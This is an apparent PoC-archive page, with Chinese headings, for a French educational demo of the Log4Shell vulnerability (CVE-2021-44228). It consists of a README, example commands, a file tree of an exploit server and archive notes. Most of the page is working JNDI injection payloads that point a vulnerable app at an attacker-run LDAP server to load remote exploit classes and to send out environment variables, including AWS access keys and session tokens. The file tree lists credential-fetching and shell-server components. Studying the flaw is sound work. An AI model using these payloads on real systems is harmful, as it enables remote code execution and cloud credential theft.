关联漏洞
描述
Démo du fonctionnement de log4shell (CVE-2021-44228)
介绍
# Log4Shell
Ce projet est une démonstration du fonctionnement de la faille de sécurité log4shell.
Cette faille est décrite dans la CVE-2021-44228.
Le projet est destiné à un usage pédagogique uniquement.
Il ne doit être utilisé que sur votre propre système et uniquement dans un but expérimental.
**Toute exécution est effectuée à vos risques et périls.**
**L'auteur décline toute responsabilité en cas d'incident en conséquence de l'exécution du projet.**
## Exemple de commandes
ldap_server=i-09cd4f41e5a2b1d66.eu-west-3.compute.internal:1389
hello '${jndi:ldap://'"${ldap_server}"'/run=log4shell.Exploit}'
hello '${jndi:ldap://'"${ldap_server}"'/run=log4shell.ExploitP,msg=my friend}'
hello '${jndi:ldap://'"${ldap_server}"'/run=log4shell.aws.FetchCreds}'
hello '${jndi:ldap://'"${ldap_server}"'/log=PATH:${env:USER}}'
hello '${jndi:ldap://'"${ldap_server}"'/log=PATH:${env:PATH}}'
hello '${jndi:ldap://'"${ldap_server}"'/log=os=${java:os}}'
hello '${jndi:ldap://'"${ldap_server}"'/log=aws_credentials,AWS_ACCESS_KEY_ID=${env:AWS_ACCESS_KEY_ID},AWS_SECRET_ACCESS_KEY=${env:AWS_SECRET_ACCESS_ID},AWS_SESSION_TOKEN=${env:AWS_SESSION_TOKEN}}'
文件快照
[4.0K] /data/pocs/9da9788670ded4e59b6c89f29338ddebdbce2503
├── [4.0K] gradle
│ └── [4.0K] wrapper
│ ├── [ 58K] gradle-wrapper.jar
│ └── [ 200] gradle-wrapper.properties
├── [7.9K] gradlew
├── [2.7K] gradlew.bat
├── [4.0K] hello
│ ├── [ 831] build.gradle.kts
│ └── [4.0K] src
│ └── [4.0K] main
│ ├── [4.0K] java
│ │ └── [4.0K] log4shell
│ │ └── [ 484] Hello.java
│ └── [4.0K] resources
│ └── [ 316] log4j2.xml
├── [ 558] install
├── [ 34K] LICENSE
├── [4.0K] log4shell-server
│ ├── [1.0K] build.gradle.kts
│ └── [4.0K] src
│ ├── [4.0K] main
│ │ ├── [4.0K] java
│ │ │ └── [4.0K] log4shell
│ │ │ ├── [4.0K] aws
│ │ │ │ ├── [3.2K] Creds.java
│ │ │ │ ├── [4.3K] FetchCreds.java
│ │ │ │ ├── [1.4K] InstanceSession.java
│ │ │ │ └── [ 370] LogCreds.java
│ │ │ ├── [ 273] Command.java
│ │ │ ├── [ 995] CommandParser.java
│ │ │ ├── [1.4K] Config.java
│ │ │ ├── [ 204] Exploit.java
│ │ │ ├── [ 741] ExploitP.java
│ │ │ ├── [2.5K] HttpClient.java
│ │ │ ├── [7.7K] HttpServer.java
│ │ │ ├── [ 948] IO.java
│ │ │ ├── [ 519] Json.java
│ │ │ ├── [2.7K] LdapServer.java
│ │ │ ├── [1.5K] LogCommand.java
│ │ │ ├── [ 597] NoOpCommand.java
│ │ │ ├── [2.3K] RunCommand.java
│ │ │ ├── [1.1K] ShellServer.java
│ │ │ ├── [ 125] WithHttpServerUri.java
│ │ │ └── [ 116] WithParams.java
│ │ └── [4.0K] resources
│ │ └── [ 931] logback.xml
│ └── [4.0K] test
│ └── [4.0K] java
│ └── [4.0K] log4shell
│ └── [ 842] DnTest.java
├── [1.2K] README.md
└── [ 401] settings.gradle.kts
18 directories, 34 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。